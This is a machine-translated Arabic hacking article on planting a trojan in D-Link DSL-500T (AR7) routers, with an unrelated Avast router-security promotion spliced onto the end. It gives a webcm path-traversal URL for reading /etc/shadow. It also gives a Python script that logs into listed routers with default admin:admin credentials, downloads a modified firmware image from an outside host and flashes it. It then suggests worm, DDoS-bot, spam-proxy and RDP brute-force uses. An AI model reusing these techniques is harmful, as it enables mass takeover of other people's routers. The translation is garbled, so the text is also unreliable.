مرحبا القارئ! في هذا المقال سوف أتحدث عن موجهات ADSL الرائعة.
- قطع الحديد التي لا غنى عنها في الشبكات المنزلية والصناعية. سأخبرك عن السؤال
استغلال هذه القطع من الحديد لأغراض مفيدة لنا - الخياطة بطريقة وحشية
طروادة داخل جهاز التوجيه. وبطريقة لا يلاحظها أحد
مشرف ذكي ، لا يوجد مستخدم ذو أذنين كبيرة.

رغبات أو متطلبات معدل الذكاء

عندما كتبت هذا المقال ، افترضت أن قراءته ستكون كافية
مستخدم متقدم مثبت عليه GNU \ Linux ولديه أيضًا بعض المهارات
العمل والبرمجة في نظام التشغيل هذا. ومع ذلك ، يبدو
من الممكن أن أكرر خطواتي على Windows (باستخدام Cygwin ، على سبيل المثال) ، ولكن
لن يتم وصفه. لتحقيق أقصى قدر من المتعة ، تحتاج أيضًا
مهارات لحام الحديد (هذا اختياري).

وبدأ كل شيء ...

شيء أستطرد. لذلك ، بدأ كل شيء كيف حدث هذا في يوم من الأيام
قطعة حديد ، أو بالأحرى ، قطعت الاتصال بالإنترنت غدراً ولم تفعل
أراد استعادته. في الوقت نفسه ، كانت بعيدة ، ماديًا
لم تكن هناك (ومع ذلك ، لقد كذبت بشأن شيء ما - كنت كسولًا جدًا لدرجة أنني لم أستطع النهوض من الأريكة
أعد تشغيل جهاز التوجيه :)) ، لم تستجب واجهة الويب ، لكنني تذكرت ذلك
هذا الشيء يجب أن يكون telnet أو ssh. قم بتسجيل الدخول إلى منطقة الإدارة
لم أحاول من قبل وتهورت بتغيير كلمة المرور إلى حسابي (مثل
اتضح لاحقًا ، عبثًا ، لأنه افتراضيًا هو "admin: admin"). لذا أنا
جربت SSH وعملت!

$ ssh [بريد إلكتروني محمي]
كلمة المرور $:

مفاجئ! Busybox! لم أفكر في من تحت
هذا الموجه يتحكم ، اتضح - GNU / Linux! خفت
أتساءل كيف يعمل كل شيء هنا ، وبفضل الكسل والصدفة عقليًا ، أنا
شرعت في البحث.

جمع المعلومات

إذن من أين أبدأ؟ بالطبع من قائمة الأوامر المتاحة:

#BUSYBOX
...
الوظائف المحددة حاليًا:
[، ash، busybox، cat، chgrp، chmod، chown، cp، date، dd، df، echo، false، free،
grep، hostname، id، ifconfig، init، insmod، kill، ln، login، ls، lsmod، mkdir،
modprobe ، mount ، mv ، passwd ، ping ، ps ، pwd ، reboot ، rm ، rmmod ، route ، sh ، sleep ،
مزامنة ، القطران ، الاختبار ، tftp ، اللمس ، صحيح ، tty ، umount ، wget ، whoami ، نعم

المجموعة عقلانية تمامًا ، وهي كافية للبحث العادي وتنفيذ الأفكار.
بعد ذلك ، نشأ الاهتمام بإصدار النواة:

# قطة / بروك / نسخة
إصدار Linux 2.4.17_mvl21-malta-mips_fp_le ( [بريد إلكتروني محمي]) (مجلس التعاون الخليجي الإصدار 2.95.3
20010315 (إطلاق / مونتافيستا)) # 1 الخميس 28 ديسمبر 05:45:00 CST 2006

كمرجع: MontaVista هو توزيع يركز على المضمنة
الأنظمة. الغالبية العظمى من مصنعي معدات الشبكة يتنازلون
تفضيل لهذا النظام. يمكن العثور عليه أيضًا على أجهزة أخرى ، على سبيل المثال ، في
الكتب الإلكترونية أو الهواتف المحمولة.

# قطة / الخ / الإصدارات
العميل = DLinkRU
الموديل = DSL-500T
الإصدار = V3.02B01T01.RU.20061228
HTML_LANG = EN.302
اللوحة = AR7VW
VERSION_ID =
CPUARCH_NAME = AR7
MODEL_ID =
FSSTAMP = 20061228055253

# cat / proc / cpuinfo
المعالج
: 0
نموذج وحدة المعالجة المركزية
: MIPS 4KEc V4.8
بوجوميبس
: 149.91
تعليمات الانتظار: لا
مؤقتات ميكروثانية: نعم
ناقل المقاطعة الإضافي: نعم
نقطة مراقبة الأجهزة: نعم
استثناءات VCED: غير متوفر
استثناءات VCEI: غير متوفر

AR7 عبارة عن شريحة ثنائية النواة تم تطويرها بواسطة شركة Texas Instruments. هو
يحتوي على موجه ADSL كامل على شريحة واحدة تدعم معايير ADSL1 ،
ADSL2 و ADSL2 +. استنادًا إلى معالج MIPS 4KEc RISC عالي الأداء ، مع
تردد الساعة 175 أو 233 (حسب تقنية الإنتاج: 18 ميكرومتر
أو 13 ميكرومتر). تحتوي الرقاقة على واجهتين UART على اللوحة ، إحداهما (UART_A)
تستخدم لإخراج معلومات التصحيح ، بالإضافة إلى واجهة EJTAG التي تخدم
لتصحيح الأخطاء (البرامج الثابتة) ذاكرة فلاش. حول استخدام هذه الواجهات ستكون
هو موضح أدناه.

أخيرًا ، نظرت إلى معلومات الذاكرة:

# قطة / بروك / يتصاعد
/ dev / mtdblock / 0 / squashfs ro 0 0
لا شيء / devfs rw 0 0
proc / proc rw 0 0
ramfs / var ramfs rw 0 0

# قطة / proc / mtd
ديف: الحجم يمحو الاسم
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

بطبيعة الحال ، لا تنسى حجب العناوين:

# cat / proc / ticfg / env | grep متد
mtd0 0x900a1000،0x903f0000
mtd1 0x90010090،0x900a1000
mtd2 0x90000000.0x90010000
mtd3 0x903f0000،0x90400000
mtd4 0x90010000،0x903f0000

مما سبق ، تبع ذلك أن ذاكرة الفلاش (/ dev / mtdblock) بها 5 كتل:

mtd0- صورة نظام ملفات SquashFs. هذا ملف خاص
نظام مضغوط للقراءة فقط. إلى عن على
خوارزمية الضغط هي gzip ، لكنها في هذه الحالة هي LZMA (نسبة الضغط
في الاعلى). حجم هذه الكتلة 4 ميغا بايت.

mtd1- تحتوي هذه الكتلة على قلب MontaVista المضغوط بواسطة خوارزمية LZMA
الشرط ، حجم الكتلة 600 كيلو بايت.

MT2- Bootloader ADAM2 ، ينفذ kernel boot ، أيضًا
خدمة خادم FTP للاسترداد والوميض. المزيد عن ذلك سيكون
قال كذلك. حجم الكتلة 64 كيلو بايت.

MT3- مشتركة بين بيانات التكوين والبيئة
(متغيرات البيئة) ، والتي يمكن عرضها في / proc / ticfg / env.
بيانات التكوين موجودة في /etc/config.xml. وسيط بين الملف
كتلة تكوين النظام مغلقة (مثل كل cm_ * التي تتحكم ، o
لهم لاحقًا) برنامج cm_logic. حجم هذه الكتلة هو أيضًا 64 كيلو بايت.

MT4- يحتوي هذا على توقيع البرنامج الثابت والنواة وصورة الملف
الأنظمة. يتم استخدام هذه الكتلة عند تحديث البرنامج الثابت عبر واجهة الويب.
في البداية ، يتم تخزينه في هذه الكتلة ، ثم يتم فحص المجموع الاختباري
وإذا تقاربت ، تتم كتابتها إلى موقعها الجديد.

ذاكرة الوصول العشوائي (16 ميغا بايت في هذا النموذج ، ولكن ADAM2 في هذا النموذج
يرى 14 ميغا بايت فقط ، ويتم التعامل معه من خلال تحديث) ، ومثبت في دليل / var ، و
يمكن استخدامها بأمان لأغراضنا:

# مجانا
إجمالي المخازن المؤقتة المشتركة المجانية المستخدمة
Mem: 14276 10452 3824 0

دعونا لا ننسى استعراض قائمة العمليات. من المثير للاهتمام الكامنة هنا
daemons: thttpd - خادم الويب ؛ dproxy - التخزين المؤقت لاستعلامات DNS الخادم الوكيل ؛ ddnsd
- خفي DNS pppd ... - البرنامج الخفي الفعلي الذي ينفذ اتصال البروتوكول
PPP ، وفي المعلمات نرى معلومات الحساب. لذا ، إذا لم يكن جهاز التوجيه كذلك
يتظاهر بأنه خرطوم (قراءة - ليس في وضع الجسر) ، ثم يمكنك ذلك
من السهل الحصول على حساب.

برامج cm_ * مملوكة ومضمنة بالفعل في أكواد المصدر.
تم تجميعها (تم تطوير هذه البرامج أيضًا بواسطة Texas Instruments ، على D-Link
ليست هناك حاجة للقسم لعدم الامتثال للتراخيص).

cm_logic- برنامج يتحكم في منطق النظام من خلاله
يمر التكوين يزامن /etc/config.xml مع
الجزء المقابل من محتويات / dev / ticfg (مشيرًا إلى mtd3).

cm_cli- واجهة سطر الأوامر للإدارة والتكوين
الأنظمة. على سبيل المثال ، يتم إجراء إعدادات الاتصال من خلال هذه الواجهة.

cm_pc- إطلاق ومراقبة العمليات ، والروابط مع القواعد
(على سبيل المثال ، قم بتشغيل البرنامج كبرنامج خفي ، وتتضمن القواعد أيضًا معلومات حول
المنافذ المراد فتحها) كما هو موضح في /etc/progdefs.xml ؛ بعد تحميلها مباشرة
حبات.

webcm- واجهة CGI مليئة بالثغرات ، على سبيل المثال تسمح لك بالنظر إلى / etc / shadow ،
ببساطة عن طريق الوصول إلى عنوان URL.

http://192.168.1.1/../../../etc/shadow

لم تحصل على شيء ، فإن thttpd ليس بهذه البساطة ، ولكن إذا كان الأمر كذلك:

http://192.168.1.1/cgi-bin/webcm؟getpage=/etc/shadow

شيء آخر. يمكن استخدام هذا لجمع المعلومات إذا لم يكن هناك وصول إليها
ssh / telnet ، ولكن هناك وصول إلى واجهة الويب.

الثابتة- يستخدم للوميض عبر واجهة الويب. في المدخل
من هذا البرنامج ، يتم إرسال صورة عن طريق طلب POST من واجهة الويب ، وهي بالفعل
يعيد التوجيه إلى ذاكرة فلاش بعد فحص المجموع الاختباري للصورة.

هذا يكمل جمع المعلومات الأولية ، حان الوقت للانتقال إلى الحاسمة
أجراءات.

تثبيت أدوات التطوير وترجمة البرامج الثابتة

البرامج الثابتة لأجهزة توجيه D-Link (وجميع البرامج الأخرى التي تعتمد على GNU / Linux)
يتم توزيعها بموجب ترخيص GPL ، يمكنك الحصول عليها رسميًا
خادم بروتوكول نقل الملفات. في الواقع ، يمكنك اختيار أي من قائمة البرامج الثابتة المقترحة ،
هم نفس الشيء (فيما يتعلق بسلسلة T). في التسليم - الكود المصدري للنواة ، البيئة ،
الأدوات اللازمة وسلسلة الأدوات لتطوير / تجميع القائمة
البرامج. يجب تفكيكها إلى الجذر وإضافتها إلى متغير البيئة
مسار المسار إلى دليل سلة الأدوات:

$ tar xvf tools.tgz
مسار التصدير $ = $ PATH: / opt /

الآن ، لتجميع البرامج الثابتة الخاصة بك ، انتقل إلى الدليل
مع أكواد المصدر وتنفيذ هذا النوع نفسه.

$ cd DSL / TYLinuxV3 / src && make

سيتم طرح العديد من الأسئلة حول تمكين دعم الجهاز (أفضل
أجبهم بالإيجاب). في نهاية التجميع في دليل TYLinuxV3 / images
سيتم إنشاء صور البرامج الثابتة. يمكنك أيضًا تشغيل برنامج نصي بنفس اسم اسمك.
نموذج من دليل / TYLinuxV3 / src / scripts.

بضع كلمات حول نقل الملفات بين جهاز توجيه وجهاز كمبيوتر. الأول
الطريقة التي استخدمتها هي القدرة على نقل الملفات باستخدام بروتوكول SSH ،
باستخدام برنامج scp لهذا الغرض. لكن بعد ذلك بقليل اكتشفت أن mc (منتصف الليل
Commander) لديه أيضًا القدرة على الاتصال عبر SSH (لوحة -> اتصال شل).
بدلاً من ذلك ، يمكنك إعداد خادم ويب أو خادم FTP في مكان عملك. لاحقًا
أعطى الأفضلية لخادم الويب ، لأنه يعمل بسرعة أكبر. أنا ركبت
thttpd ، صغير وسريع ، تمامًا مثل جهاز التوجيه. نطلق في المنزل ونتوقف
ملف جهاز التوجيه ، بعد الانتقال إلى دليل / var (كما هو مذكور
كان متاحًا للتسجيل سابقًا).

$ thttpd -g -d ~ / ForRouter -u user -p 8080
# cd / var
# wget http://192.168.1.2/file

لتنزيل ملف من جهاز التوجيه ، يمكنك أيضًا رفع خادم الويب:

# thttpd -g -d / var -u root -p 8080

انتبه ، إذا كنت تريد تنزيل ملف قابل للتنفيذ من جهاز التوجيه ، فيجب عليك ذلك
إزالة حقوق الإطلاق. عند تنزيل عدد كبير من الملفات من جهاز التوجيه
من الأفضل استخدام mc ، فلن تحتاج إلى نسخ الملفات إلى var / أولاً و
إزالة الحقوق ، ثم حذف هذه الملفات لتحرير مساحة. بشكل عام ، الأمر
ذوق ، اختر أي خيار يناسبك.

إنشاء البرنامج الخاص بك

لنبدأ بالطبع مع كلاسيكيات البرمجة - HelloWorld. بعض خاص
لا توجد قوانين. نص البرنامج مألوف بشكل مؤلم:

#تضمن
#تضمن

int main (باطل)
{
printf ("Mate.Feed.Kill.Repeat.") ؛
العودة 0 ؛
}

نقوم بتجميع (المسار إلى سلسلة الأدوات "ويجب تحديده في متغير البيئة
طريق):

mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-Strip -s الجحيم

# cd / var
# chmod + x hell
# ./الجحيم

و ... لن يحدث شيء ، أو أن إشعار المسار الذي لم يتم العثور عليه سوف يسقط. ما هو
عمل؟ لقد تحدثت بالفعل عن cm_pc في وقت سابق - هذا البرنامج يطلق برامج أخرى في
وفقًا للقواعد الموضحة في /etc/progdefs.xml. هنا يأتي الوقت
تعديل وفلاش صور نظام الملفات.

تعديل نظام الملفات

لتعديل نظام الملفات ، تحتاج أولاً إلى
أفرغ. كما ذكرت ، نظام الملفات هنا هو SquashFs مع تصحيح LZMA.
تتضمن حزمة تطوير البرامج الثابتة برنامج mksquashfs فقط (لإنشاء ملفات
image) ، unsquashfs (للتفريغ) مفقود. لكن لا يهم ، كل شيء متاح
على موقع نظام الملفات ، نحتاج إلى الإصدار الأول. عن طريق تطبيق تصحيح LZMA و
بعد جمع المرافق ، وضعناها جانبًا في مكان مناسب. أولاً ، دعنا نحصل على صورة
نظام الملفات من جهاز التوجيه:

# cat / dev / mtdblock / 0> /var/fs.img

mkdir $ unpacked_fs
$ unsquashfs fs.img unpacked_fs

الآن يمكنك التعديل كما تريد ، لكننا نريد طرح FuckTheWorld فيه
الدليل / bin وأضف قاعدة للتشغيل في /etc/progdefs.xml.

$ cp مرحبًا unpacked_fs / bin
$ vim unpacked_fs / etc / progdefs.xml

ويضاف هذا (بين العلامات ):

الجحيم
/ بن / الجحيم

حفظ وحزم مرة أخرى:

mksquashfs $ unpacked_fs my_fs.img -noappend

لاحظ أن صورة نظام الملفات يجب ألا تتجاوز
الأحجام المسموح بها. إذا كنت ترغب في تجربة شيء ما بشكل عاجل ، ولم يحدث ذلك
يناسب ، أزل شيئًا "غير ضروري" من الصورة مثل grep أو whoami أو
استخدم الحزم القابل للتنفيذ UPX. الآن قم بالتحميل إلى جهاز التوجيه
الصورة والانتقال إلى القسم التالي.

التقاط صورة نظام الملفات

طريقة وميض جهاز التوجيه بسيطة للغاية ، فهي تتمثل في الوصول إلى الجهاز
/ dev / mtdblock / *. لذا ، قم بتحميل صورة الملف إلى جهاز التوجيه بأي طريقة مناسبة.
النظام وتنفيذ هذا الإجراء البسيط:

# cat my_fs.img> / dev / mtdblock / 0 && إعادة التشغيل

# cp my_fs.img / dev / mtdblock / 0 && إعادة التشغيل

بعد فترة من الوقت ، عندما تنتهي عملية التسجيل ، سيتم إعادة تشغيل جهاز التوجيه ، و
ستصبح التغييرات سارية المفعول. دعنا نحاول تشغيل مثالنا:

#الجحيم
ماتي ، تغذية ، اقتل ، كرر.

طرق التعافي في حالة الفشل

قبل وميض جهاز التوجيه بـ "الحرف" الأكثر جدية ، يجب أن تتعلم كيف
التصرف في الحالات الحرجة عندما يرفض جهاز التوجيه
حمل. لا توجد حالات ميؤوس منها. يأتي خادم ADAM2 FTP للإنقاذ. إلى عن على
تحتاج أولاً إلى تشغيل عميل FTP على عنوان IP ADAM2 ، والذي يمكن أن يختلس النظر
في / proc / ticfg / env (المعلمة my_ipaddress).

192.168.1.199 دولارًا لبروتوكول نقل الملفات بالدولار
220 ADAM2 FTP Server جاهز.
530 الرجاء تسجيل الدخول باستخدام USER و PASS.

من أجل الوضوح ، يمكنك تشغيل وضع التصحيح ، ثم تشغيل الكل
المعلومات وجميع استجابات FTP:

تسجيل الدخول / كلمة المرور - adam2 / adam2. عملية الوميض بسيطة للغاية. للبدأ
قم بتغيير جلسة FTP إلى الوضع الثنائي:

ftp> اقتبس MEDIA FLSH

نرسل الآن ، على سبيل المثال ، صورة لنظام الملفات ونحدد الموقع
المكان المقصود:

ftp> ضع fs.img "fs.img mtd0"

نحن في انتظار نهاية التسجيل ، أعد تشغيل جهاز التوجيه ، واخرج من الجلسة:

بروتوكول نقل الملفات> اقتبس إعادة التشغيل
بروتوكول نقل الملفات> إنهاء

الجميع! كما ترى ، لا يوجد شيء صعب ، الآن إذا حدث خطأ ما ، أنت
يمكنك دائمًا تصحيح الأمور.

للراحة ، يجب عليك إعطاء عنوان IP عادي ، وتمكين
تنزيل تلقائي (حتى لا ترقص مع إعادة التعيين) وزيادة الوقت قليلاً
انتظار الاتصال قبل تحميل النواة. يتم تخزين كل هذه الإعدادات بتنسيق
متغيرات البيئة ، هناك أوامر ADAM2 FTP خاصة: GETENV و SETENV (لـ
الحصول على متغير وتعيينه ، على التوالي). في جلسة FTP ، أدخل ما يلي
الأوامر:

ftp> التحميل التلقائي لـ SETENV ، 1
ftp> SETENV autoload_timeout، 8
ftp> SETENV my_ipaddress، 192.168.1.1
بروتوكول نقل الملفات> اقتبس إعادة التشغيل
بروتوكول نقل الملفات> إنهاء

يتم إعادة تشغيل جهاز التوجيه ويمكنك الانتقال إلى ADAM2 على 192.168.1.1:21. اذا كان
ستكون هناك رغبة في تعيد تحميل ملفات صورة النواة ، وسوف ترفض النواة التمهيد ، FTP
سيبدأ من تلقاء نفسه. قبل الوميض بالصور المعدلة ، تأكد من ذلك
حفظ الحالية من أجل الانتعاش. بشكل عام ، يمكنك تغيير متغيرات البيئة
وعبر / proc / ticfg / env ، أردت فقط التحدث أكثر عن العمل مع FTP.

# echo my_ipaddress 192.168.1.1> proc / ticfg / env

ويمكنك التحقق من التغييرات مثل هذا:

# cat / proc / ticfg / env | grep my_ipaddress

ماذا تفعل إذا كنت تريد تجربة وميض أداة تحميل التشغيل ، وكيف
التصرف في حالة الفشل؟ أو لا يبدأ جهاز التوجيه لسبب ما ، و
لا يمكن الوصول إلى ADAM2؟ هناك طريقة للخروج - JTAG ، أو بالأحرى ، EJTAG موجود في هذه الشريحة
(نسخة موسعة). هذه واجهة للتصحيح / البرمجة داخل الدائرة.

للاتصال بهذه الواجهة ، نحتاج إلى منفذ LPT للكمبيوتر ،
موصلات و 4 مقاومات. المخطط بسيط.

أسارع إلى ملاحظة أن البرامج الثابتة عبر JTAG ليست عملاً سريعًا ، وستستغرق ما يكفي
الكثير من الوقت. لذلك يجب استخدامه فقط لاستعادة أداة تحميل التشغيل ،
حتى لو لم تنجح. للتواصل عبر JTAG ، يجب عليك استخدام خاص
برنامج مثل UrJTAG. يوجد أدناه مثال على كيفية عمل هذه الواجهة.
إعداد الاتصال:

jtag> كبل موازٍ 0x378 DLC5
jtag> كشف

كشف ذاكرة الفلاش:

jtag> اكتشاف فلاش 0x30000000 1

قراءة ذاكرة فلاش:

jtag> readmem 0x30000000 0x400000 fullflash.img

الكتابة في الذاكرة (أداة تحميل التشغيل):

jtag> flashmem 0x30000000 adam2.img

من المفيد أيضًا معرفة واجهة UART (لقد وعدت بالحديث عنها سابقًا). في
تقارير UART_A ، أي أن محمل الإقلاع (bootloader) يسجل (في مرحلة مبكرة من التمهيد من
يمكنك التحدث معه) والجوهر. عند كتابة حبات معدلة ، هذا
لا غنى عنه للتصحيح. UART - جهاز استقبال / جهاز إرسال غير متزامن عالمي
(جهاز الإرسال والاستقبال العالمي غير المتزامن) موجود دائمًا تقريبًا في
ميكروكنترولر.

دائرة المحول بسيطة للغاية. على أساس شريحة واحدة فقط -
محول مستوى TTL: MAX232 لـ COM و FT232R لـ USB. دوائر دقيقة
شائعة جدًا ولن تكون هناك مشاكل في الشراء.

يتم تجميع الدائرة على لوح تجارب (يمكن وضعه بأمان في علبة
موصل منفذ COM) في 20 دقيقة ويحقق الكثير من الفوائد. على سبيل المثال ، عند التصحيح
الألباب هي حل لا غنى عنه على الإطلاق. وإذا كانت الإلكترونيات ضيقة؟ مخرج
هي أسلاك USB للهواتف القديمة ، لديهم محول فقط
UART - USB.

بعض أفكار التوزيع

وكيلك / جواربك على جهاز توجيه شخص آخر رائع. كما ، في الواقع ، البريد العشوائي
على جميع البروتوكولات الموجه. هذا ليس جهاز كمبيوتر يعمل بنظام Windows.
إعادة الترتيب كل شهر :). غالبًا لا تتغير أجهزة التوجيه أو تعيد تحميل ملفات. نعم و
من ، إلى جانبنا ، سيأتي بفكرة إصابة جهاز توجيه؟

لا تنس ، نحن نتحكم في كل حركة المرور من المستخدم / الشبكة. للمزيد من
أجهزة راوتر قوية ومن الممكن بالفعل تعليق روبوت DDOS. إخفاء الملف / إخفاء العملية ،
اعتراض الكتابة إلى كتل mtd ، والقضاء على محو برنامجنا - كل ذلك
ايا كان!

لنفترض أنك ستبدأ في كتابة برنامج جاد لجهاز التوجيه.
يعد التصحيح الجيد جدًا أمرًا مهمًا ، وربما يتعين عليك القيام بذلك مرات عديدة
إعادة كتابة / استعادة الصور ... هذا احتمال محزن للغاية. حتى الأيدي
أقل قليلاً ، إذا أخذنا في الاعتبار أيضًا أن مورد إعادة الكتابة لذاكرة فلاش
صغير (مزيد من التفاصيل في وثائق شريحة الذاكرة) ، وهناك احتمال
تخلص منها. ولكن هناك طريقة للخروج! يمكن لـ Qemu محاكاة AR7! هل يمكنك تخيل ماذا
هل يوفر فرصًا وراحة لا حدود لها؟ الآن لا يوجد شيء يمنعنا
اكتب شيئًا رائعًا بشكل لا يصدق!

لذا. لقد كتبت برنامجًا ، وتحققت منه بنفسك أو على جهاز توجيه واحد أو اثنين من أجهزة التوجيه الخاصة بالأشخاص الآخرين ، ولكن
الشبكة بأكملها لا تزال في المقدمة ، والإصابة يدويًا هي عمل روتيني ، على جهاز التوجيه العاشر الذي تبدأه بالفعل
يلعن العالم كله ، ويطفو في عيون من أوتار "القط" و "mtd". دعنا نكتب
برنامج لأتمتة هذه الإجراءات الروتينية. اخترت لغة الثعبان.

خطة العمل هي:

• تجميع قائمة بأجهزة التوجيه ، على سبيل المثال ، باستخدام nmap ؛
• يجب أن يأخذ البرنامج النصي عناوين IP من القائمة بالترتيب ، أدخل من خلال
  telnet مع تسجيل الدخول / كلمة المرور القياسية ؛
• ثم نفس الإجراءات: تحميل الصورة المعدلة ،
  الكتابة ، إعادة التشغيل.

#! / usr / bin / env python
# ترميز = UTF-8

استيراد telnetlib ، الوقت

الخادم = "http://anyhost.com/fs.image"

للعنوان المفتوح ("iplist.txt"):
telnet = telnetlib.Telnet (addr)
telnet.set_debuglevel (1)
telnet.read_until ("تسجيل الدخول:")
time.sleep (5) الوقت.
telnet.write ("admin \ n")
telnet.read_until ("كلمة المرور:")
telnet.write ("admin \ n")
telnet.read_until ("#")
telnet.write ("cd / var && wget" + SERVER)
telnet.read_until ("#")
telnet.write ("cat fs.image> / dev / mtdblock / 0")
telnet.read_until ("#")
telnet.write ("إعادة التشغيل")
telnet.close ()

منطق السيناريو بعيد جدًا عن المثالية ، الآن سأشرح السبب. إلى عن على
أولاً ، يجب عليك التحقق من إصدار البرنامج الثابت / kernel وطراز جهاز التوجيه ، لأنه قد يكون هناك
اختلافات كبيرة في الأداء. علاوة على ذلك ، بدلاً من فراغات البرامج الثابتة ، يجب عليك التنزيل
صورة نظام الملفات من جهاز التوجيه ، قم بفك حزمها وتعديلها وإرسالها
الى الخلف. سيؤدي ذلك إلى التخلص من مشكلات التوافق مع ملفات
الموديلات / إصدارات البرامج الثابتة ، لأن استقرار العمل هو أهم شيء بالنسبة لك.
أيضًا ، يمكن للفيروس أن يكون له وظائف الدودة ، ويمكنك دائمًا إذا كنت ترغب في ذلك
قم بتوصيل ماسح ضوئي للشبكة به ، القوة الغاشمة لـ RDP والرقائق المماثلة.

هناك طريقة توزيع أخرى رائعة. لا شيء يمنعك من الكتابة
برنامج لنظام التشغيل Windows ، والذي سيكون معك (أو قم بتنزيله من ملف
server) صورة لنظام الملفات وإصابة جهاز التوجيه بها ، إذا كان موجودًا.
توزيع هذا البرنامج بجميع الطرق "القياسية": محركات الأقراص القابلة للإزالة ،
استغلال البرامج ، وإصابة البرامج الأخرى ... الجمع بين هذه الأساليب ،
يمكن أن يكون جائحة رئيسيا. فقط تخيل هذه الصورة
هذه الأجهزة موجودة في كل مكان.

حماية جهاز التوجيه

بعد البحث في كل هذا ، فكرت: كيف يمكنني حماية جهاز التوجيه؟ وبعد ذلك ، كما ترى ،
سأحضر نفسي. تتمثل الخطوة الأولى في تغيير كلمة مرور المستخدم إلى كلمة مرور أكثر تعقيدًا و
طويلة (بحد أقصى 8 أحرف) ، وتغيير اللافتات وتحية الخدمة
(باستخدام محرر ست عشري ، أو يفضل إعادة تجميع البرامج) من أجل
لم يتمكن nmap أو الماسحات الضوئية الأخرى من تحديد إصدارات الخدمات.

يجب عليك أيضًا تغيير المنافذ التي تتدلى عليها الشياطين. يتم ذلك من خلال
تعديلات على progdefs.xml. اقتل telnet (أسهل طريقة لالتقاط كلمة مرور لها ، نعم
والبروتوكول غير آمن ، لماذا نحتاج إليه) ، قم بتشغيل جدار الحماية ، والسماح بالاتصال
إلى الخدمات فقط من عنوان IP أو عنوان MAC الخاصين به. استخدم أيضًا جدار حماية
لحماية شبكة أو جهاز كمبيوتر ، فليس عبثًا أن يكون موجودًا. المكان المناسب
ستساعد القواعد دائمًا في الحماية.

استنتاج

تم بناء العديد من أجهزة توجيه D-Link وغيرها من الأجهزة المماثلة ، وليس فقط
شريحة AR7 ، وتشمل القائمة Acorp و NetGear و Linksys و Actionec ... Pretty
هذا AR7 مشهور مع MontaVista. ويترتب على ذلك ، باستخدام نفس الشيء
toolchain ، دون أي مشاكل ، يمكنك تنفيذ الخطوات الموضحة في المقالة.

فكر في الأمر: بالإضافة إلى الأفعال الضارة ، يمكنك أيضًا أن تفعل شيئًا مفيدًا / ممتعًا لنفسك.
وغيرهم (لا أجادل ، لا يمكن استبدال متعة القرصنة ، ولكن لا يزال).
يمكنك جعل البرامج الثابتة الخاصة بك ، على سبيل المثال ، أجهزة توجيه أكثر قوة قادرة على ذلك
تنزيل / توزيع السيول ... جميع الموديلات لها واجهة USB 1.1 ، ولكن في الأصغر سنًا
نماذج غير ملحوم. أضف وحدة USB وبرنامج تشغيل نظام ملفات إلى kernel ،
قم بتجهيز جهاز التوجيه بذاكرة فلاش - ونتيجة لذلك ، تحصل على نوع من تخزين الشبكة لـ
القليل من المال. هناك الكثير من الخيارات والأفكار يجب أن تظهر بالآلاف - لا
حد نفسك ، وخلق وخلق!

يعد جهاز التوجيه الخاص بك أحد أضعف الروابط في الأمان لديك ، وقد أثبت الباحثون ذلك مرة أخرى.

تم العثور على ستين ثغرة أمنية في 22 طرازًا من أجهزة التوجيه حول العالم ، معظمها في تلك التي يوفرها مزودو خدمة الإنترنت لعملائهم. يمكن أن يسمح وجود هذه الثغرات للمتسللين باختراق الأجهزة وتغيير كلمات المرور وتثبيت وتنفيذ البرامج النصية الخبيثة التي تغير خوادم DNS. وبالتالي ، يمكن للقراصنة إعادة توجيهك إلى مواقع ويب ضارة أو تنزيل تعليمات برمجية ضارة على جهاز الكمبيوتر الخاص بك عند زيارة صفحات الويب الرسمية.

تسمح الثغرات الأمنية أيضًا للمتسللين بقراءة وكتابة المعلومات على أجهزة تخزين USB المتصلة بجهاز توجيه تم اختراقه.

تصف الدراسة كيف يمكن للمهاجمين الوصول إلى جهاز كمبيوتر - أي من خلال باب خلفي بكلمة مرور عامة ، يستخدمه موظفو الموفر الفني لمساعدة العملاء عن بُعد عبر الهاتف. يتم إخفاء وصول المسؤول الثاني هذا عن مالك جهاز التوجيه افتراضيًا.

ما هي نماذج جهاز التوجيه التي تم اختبارها؟

اختبر الباحثون النماذج التالية: Amper Xavi 7968 و 7968+ و ASL-26555 ؛ أستوريا ARV7510 ؛ بلكين F5D7632-4 ؛ سيلينكسيس WRT54GL ؛ كومترند WAP-5813n و CT-5365 و AR-5387un و 536+ ؛ D-Link DSL-2750B و DIR-600 ؛ هواوي HG553 و HG556a ؛ ؛ نتغير CG3100D ؛ Observa Telecom AW4062 و RTA01N و Home Station BHS-RTA و VH4032N ؛ Sagem LiveBox Pro 2 SP و Fast 1201 و Zyxel P 660HW-B1A.
نظرًا لأن الباحثين من مدريد ، كان التركيز الرئيسي لأبحاثهم هو أجهزة التوجيه ، التي يتم توفيرها من قبل مزودي الإنترنت الإسبان ، ولكن يتم استخدام Linksys و D-Link و Belkin على نطاق واسع في روسيا ودول أخرى.

كيف يمكنك حماية جهاز التوجيه الخاص بك؟

تحتوي جميع برامج مكافحة الفيروسات من Avast على ميزة أمان الشبكة المنزلية (HNS) المضمنة التي تفحص شبكات Wi-Fi سيئة التكوين ، وتشير إلى كلمات مرور Wi-Fi ضعيفة أو افتراضية ، ونقاط الضعف في جهاز التوجيه ، واتصالات الإنترنت المخترقة ، وبروتوكول IPv6 الممكّن ولكن غير الآمن . تعرض هذه الوظيفة أيضًا قائمة بالأجهزة المتصلة بالشبكة ، مما يساعدك على ضمان اتصال الأجهزة التي تعرفها فقط بشبكتك. Avast هي شركة أمن المعلومات الوحيدة التي توفر القدرة على تأمين هذه المنطقة.

كيف تفحص جهاز التوجيه المنزلي الخاص بك باستخدام Home Network Security؟

افتح واجهة مستخدم Avast ، وانقر فوق الزر Scan من القائمة الموجودة على اليسار ، ثم حدد Network Threat Scan.
سيقوم Avast بفحص جهاز التوجيه الخاص بك وتقديم تقرير عن التهديدات التي يعثر عليها. في معظم الحالات ، إذا تم اكتشاف تهديد يستدعي انتباهك ، فسيقوم Avast بتوجيهك إلى موقع الشركة المصنعة لجهاز التوجيه.

تنشأ مشاكل عند توزيع Wi-Fi باستخدام جهاز توجيه لأسباب مختلفة. أحدها هو إصابة الجهاز الموزع بفيروس يمكنك التخلص منه بنفسك.

